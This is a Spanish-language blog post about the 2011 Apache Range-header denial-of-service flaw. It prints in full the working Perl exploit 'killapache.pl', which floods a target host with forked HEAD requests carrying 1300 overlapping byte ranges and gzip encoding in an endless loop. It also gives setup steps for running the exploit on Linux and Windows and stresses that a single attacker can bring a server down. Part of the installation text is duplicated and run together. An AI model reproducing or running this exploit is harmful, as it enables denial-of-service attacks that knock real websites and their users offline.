La vulnerabilidad de denegación de servicio en Apache fue descubierta por “Kingcope”.
La declaración de un rango de bytes permite a un navegador cargar sólo algunas partes de un documento, por ejemplo bytes de 500 a 1000. Este método es usado por programas como los clientes de descarga para reanudar las descargas que se han interrumpido, y está diseñado para reducir los requisitos de ancho de banda. Sin embargo, parece que iniciar múltiples componentes no clasificados en la cabecera puede causar un mal funcionamiento del servidor Apache.
En el caso del exploit este envía una cabecera Range al servidor, a la cual se le indican múltiples partes, en tamaño bytes, que son requeridas de la página web. Esto lo realiza mediante solicitudes HEAD al servidor añadiendo la siguiente cabecera: “Range: bytes=5-1,5-2,5-3,5-4,…,5-1299″. La clave está en que para cada parte se solicita que se comprima mediante GZIP(Accept-Encoding: gzip), dando lugar a un consumo desmesurado del servidor, principalmente CPU y RAM, que provoca una denegación del servicio en el entorno.
Killapache.pl
#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#
use IO::Socket;
use Parallel::ForkManager;
sub usage {
print "Apache Remote Denial of Service (memory exhaustion)\n";
print "by Kingcope\n";
print "usage: perl killapache.pl <host> [numforks]\n";
print "example: perl killapache.pl www.example.com 50\n";
}
sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
$pm = new Parallel::ForkManager($numforks);
$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
$p .= ",5-$k";
}
for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next;
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;
while(<$sock>) {
}
$pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}
sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;
$x = <$sock>;
if ($x =~ /Partial/) {
print "host seems vuln\n";
return 1;
} else {
return 0;
}
}
if ($#ARGV < 0) {
usage;
exit;
}
if ($#ARGV > 1) {
$numforks = $ARGV[1];
} else {$numforks = 50;}
$v = testapache();
if ($v == 0) {
print "Host does not seem vulnerable\n";
exit;
}
while(1) {
killapache();
}
Para correr el Exploit en Ubuntu o Back-Track quizas necesiten instalar la librería Parallel::ForkManager:
En Windows, tienen que tener instalado el perl (yo tengo el ActivePerl 1204) y hacer lo siguiente:
1° Ingresar el directorio en el que se instaló el perl, buscar en la carpeta bin el archivo ppm-shell.bat (doble click), se abrirá una consola ppm.
2° en la consola ppm ingresar estos 2 comandos, y todo debería funcionar perfecto.
El impacto de la vulnerabilidad es GRAVE, ya que afecta a todas las versiones de apache y no existe un parche oficial todavía (y de existir muchos no lo parcharían), sumémosle que una sola personas es suficiente para botar el servidor y realizar un DoS exitoso.
sudo apt-get install libparallel-forkmanager-perl1° Ingresar el directorio en el que se instaló el perl, buscar en la carpeta bin el archivo ppm-shell.bat (doble click), se abrirá una consola ppm.
C:\Perl64\bin\ppm-shell.bat2° en la consola ppm ingresar estos 2 comandos, y todo debería funcionar perfecto.
rep add Apache http://www.apache.org/dis/perl/win32-bin/ppms/
install Parallel::ForkManagerEl impacto de la vulnerabilidad es GRAVE, ya que afecta a todas las versiones de apache y no existe un parche oficial todavía (y de existir muchos no lo parcharían), sumémosle que una sola personas es suficiente para botar el servidor y realizar un DoS exitoso.
Referencias:
[+] Zion3R
Ingeniero, me gusta la cyberseguridad, la programación y el blockchain.
0 Notaciones:
Publicar un comentario